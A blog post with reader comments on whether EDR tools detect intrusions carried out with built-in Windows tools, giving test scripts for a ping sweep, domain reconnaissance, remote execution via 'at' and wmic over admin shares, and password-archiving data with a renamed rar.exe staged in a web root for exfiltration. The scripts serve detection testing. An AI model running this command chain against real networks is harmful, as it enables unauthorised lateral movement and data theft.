Friday, January 12, 2018

What are your tools detecting

At some point during an intrusion, if the attacker has gained enough access, the need for malware will go away.  External access to the target network can be achieved through a vpn, 3rd party connection or simple misconfiguration on an external facing device.  Lateral movement, data consolidation and staging can all happen using builtin windows tools.  Data packaging can happen with builtin tools or public archiving utilities that are most likely used, legitimately, throughout your network by multiple users.  If an attacker has achieved this level of access, it is at this point you really need to ask yourself if the tools you have in place are capable of alerting you as to what may be happening.

From an EDR perspective, how much do you feel the vendor should be detecting and alerting?  What types of data do you feel an EDR solution should be collecting?  How important is the interface and the query language?  All of this is especially important if you don’t have the capability to author your own signatures or the interface is so poorly designed that it is not feasible to generate your own alerts based on limitations imposed by the vendor.

I put together some tests that you can use to verify the capabilities of your tools when it comes to recon, lateral movement and data staging.  I would be very curious to know what your outcomes are and if there are any obvious gaps in coverage across vendors.  I think it would be pretty enlightening to the entire community.

This is also not meant to put down the work that vendors are doing in this area.  It has come a long way, but I think often we get focused on finding “the malware” when that is only one aspect.

Note: Change the below scripts and commands to match your environment.

========== a.bat ===========
@echo off
ping -n 1 192.168.1.3>>c:\temp\a.txt
ping -n 1 192.168.1.4>>c:\temp\a.txt
ping -n 1 192.168.1.5>>c:\temp\a.txt
ping -n 1 192.168.1.6>>c:\temp\a.txt
ping -n 1 192.168.1.7>>c:\temp\a.txt
ping -n 1 192.168.1.8>>c:\temp\a.txt
ping -n 1 192.168.1.9>>c:\temp\a.txt
ping -n 1 192.168.1.10>>c:\temp\a.txt
ping -n 1 192.168.1.11>>c:\temp\a.txt
ping -n 1 192.168.1.12>>c:\temp\a.txt
ping -n 1 192.168.1.13>>c:\temp\a.txt
ping -n 1 192.168.1.14>>c:\temp\a.txt
ping -n 1 192.168.1.15>>c:\temp\a.txt
ping -n 1 192.168.1.16>>c:\temp\a.txt
ping -n 1 192.168.1.17>>c:\temp\a.txt
ping -n 1 192.168.1.18>>c:\temp\a.txt
ping -n 1 192.168.1.19>>c:\temp\a.txt
ping -n 1 192.168.1.20>>c:\temp\a.txt
ping -n 1 192.168.1.21>>c:\temp\a.txt
ping -n 1 192.168.1.22>>c:\temp\a.txt
ping -n 1 192.168.1.23>>c:\temp\a.txt
ping -n 1 192.168.1.24>>c:\temp\a.txt
ping -n 1 192.168.1.25>>c:\temp\a.txt
ping -n 1 192.168.1.26>>c:\temp\a.txt
ping -n 1 192.168.1.27>>c:\temp\a.txt
ping -n 1 192.168.1.28>>c:\temp\a.txt
 
=========== Execute a.bat ========
cmd /c a.bat
 
========== b.bat ===========
@echo off
net localgroup administrators >>c:\windows\system32\b.txt
quser >>c:\windows\system32\b.txt
netstat -nab -p tcp >>c:\windows\system32\b.txt
net start >>c:\windows\system32\b.txt
net session >>c:\windows\system32\b.txt
net share >>c:\windows\system32\b.txt
net use >>c:\windows\system32\b.txt
net view >>c:\windows\system32\b.txt
net view /domain >>c:\windows\system32\b.txt
net time /domain >>c:\windows\system32\b.txt
ipconfig /all >>c:\windows\system32\b.txt
route print >>c:\windows\system32\b.txt
systeminfo >>c:\windows\system32\b.txt
dsquery server >>c:\windows\system32\b.txt
dsquery subnet -limit 10000 >>c:\windows\system32\b.txt
net group "domain admins" /domain >>c:\windows\system32\b.txt
net group "enterprise admins" /domain >>c:\windows\system32\b.txt
 
======= Mount share and copy batch script ========
nbtstat -a x.x.x.x >>c:\temp\a.txt
net use \\x.x.x.x password user:domain/user
net use Z: \\x.x.x.x\c$ password /user:domain\user
copy C:\temp\*.bat Z:\windows\system32\
dir Z:\windows\system32\*.bat
 
====== Schedule at job, execute script, copy results back, delete share ========
net time \\x.x.x.x
at \\x.x.x.x
at \\x.x.x.x 4:01 "C:\windows\system32\b.bat"
net time /domain
tasklist
dir Z:\windows\system32\b.txt
copy Z:\windows\system32\b.txt C:\temp\b.txt
at \\x.x.x.x 1 /delete /y
net use Z: /delete /y
 
========== abc.bat ===========
@echo off
c:\temp\cmd.exe a -hppassword c:\temp\abc.temp c:\data\for\exfil -x*.exe -x*.dll
 Note: cmd.exe is a renamed copy of rar.exe
=========== Create and move exfil =============
copy c:\temp\abc.bat \\x.x.x.x\c$\temp\abc.bat
copy c:\temp\cmd.exe \\x.x.x.x\c$\temp\cmd.exe
wmic /node:"x.x.x.x" /user:"domain\username" /password:"password" process call create "cmd.exe /c c:\temp\abc.bat"
copy \\x.x.x.x\c$\temp\abc.temp c:\temp\abc.temp
copy c:\temp\abc.temp \\x.x.x.x\c$\inetpub\wwwroot\website\abc.temp

9 comments:

  1. "From an EDR perspective, how much do you feel the vendor should be detecting and alerting?"

    Good question, but is it one folks should really be asking if they're not already using an EDR solution?

    I think that the tests are great, and very much like what one would see IRL...most of it, I've seen myself.

    But let me share my experience...prior to my current employment, I worked for SWRX for four years. In that time, with all of the targeted threat hunting, targeted threat response, and straight up IR work that I did, not a single client that I worked with had an EDR solution in place before they called for assistance (and I was assigned to work with them). This is just my experience, looking back...I cannot speak for everyone else.

    When I've talked to others about EDR solutions, there've been the inevitable questions about how to detect stuff like what you've show in your blog post. I'd ask questions, such as, "...to start, do your admins use net.exe to manage user accounts?", to which I've gotten a blank stare about 100% of the time...and no actual response.

    Things like this are very helpful. At the DoD Cyber Crime Conference in 2012 (in Atlanta), an attendee asked during a discussion of lateral movement, "...what does that look like?" This is why I started my "what it looks like" blog series.

    Tests like these are great ways for folks to test EDR solutions, as well. Great job, keep it coming!

    ReplyDelete
  2. Another thought...

    The only real way to get any sort of 'side-by-side' comparison, and to go beyond (or rather, make sense of...) the marketing materials, is to talk to someone who has hands-on experience using such tools IRL, one real world engagements.

    ReplyDelete
  3. Some of these things, you can look for in your environment without having/before you have an EDR solution in place...yes, I'm talking about a threat hunt. ;-)

    For the batch files, look for files with those extensions listed in AppCompatCache data. Look for unusual files listed in the AmCache.hve file, and make use of the fact that many will have SHA-1 hashes; if the path looks odd, push the hash up to VT, and see what you get. Then search on Google.

    Scheduled tasks being created/"registered" on systems appears as event ID 106 and 140 pairs in the TaskScheduler/Operational Event Log. Scheduled task deletion appears as event ID 141. I've seen tasks be deleted after a short-running .exe has run, such as a RAT installer, etc. This has the effect of removing file system and Registry artifacts of the task, but the event log artifacts remain (until their overwritten).

    I've also seen a long-running task launched, but the sched task deleted right after the process started. This leaves some very unique and extremely high fidelity artifacts in the Windows Event Log.

    Keep in mind that in order to create a sched task, the user account needs to have admin privs; once created, the task can run at System-level.

    That exfil is a great example, as I've seen it quite often. The actual exfil appears in the web server logs as GET requests for those files. I've also seen where an adversary has disabled logging and deleted all of the available logs prior to the exfil...

    ReplyDelete
    Replies
    1. Thanks for the comments, Harlan.

      "From an EDR perspective, how much do you feel the vendor should be detecting and alerting?"

      I don't think all EDR's are created equal and from what I've seen, there are some that knock it out of the park when it comes to detecting this type of behavior and others that appear to have blinders on. To be honest though, I don't know that I even care as much about the vendors ability to detect. For me, what is more important is my ability to to detect what I feel I need to be. Whether it's native detection that comes with the tool or using data produced by the tool to build my own detection. I also know that there are many factors that go into a teams ability to build their own detection so I'm also not discounting the importance of solid detection being built into the tool.

      Another aspect that may be important to people is the interface. Does it lend itself to complex queries across your environment or does it limit you to a single text string search? Are the alerts at the severity you would expect them to be? Is that configurable? Can you easily pivot within the tool to validate alerts coming in? Would the interface speed up or slow down an investigation?

      Also, is the data that is being collected exportable? If so, the interface may not be as important. If it's not exportable then interface could be a very big deal.

      Delete
  4. "I don't think all EDR's are created equal..."

    No, they're not...and that's something folks really need to understand when they're looking to make a purchase. However, before they even get to that point, they need to understand their own infrastructure and define their needs *first*, and then apply the appropriate metrics of "what is a _good_ EDR solution?" They need to go beyond the marketing hype.

    "...what is more important is my ability to to detect what I feel I need to be."

    As an incident responder who's used these tools, I've talked with clients, as well as folks interested in such things, and when I've asked, "...do your admins use 'net.exe' to manage user accounts?", I just get a blank stare back. This goes to your "my ability to detect what I feel I need to be." I worked with one client who took this to heart, wrote a filter for their EDR solution, and detected the adversary's return...this time around, the IR took less than an hour.

    The UI for tools is important...how much of a change to their own workflow, or frame of reference if they don't have a workflow, does a user need to make?

    ReplyDelete
  5. Descriptive statistics include processes you are probably already familiar with such as calculating the average score on a test for a particular class.

    Discovering Statistics Using SPSS test bank & solutions manual

    ReplyDelete
  6. I'm interested in this topic. thank you for the article.

    ReplyDelete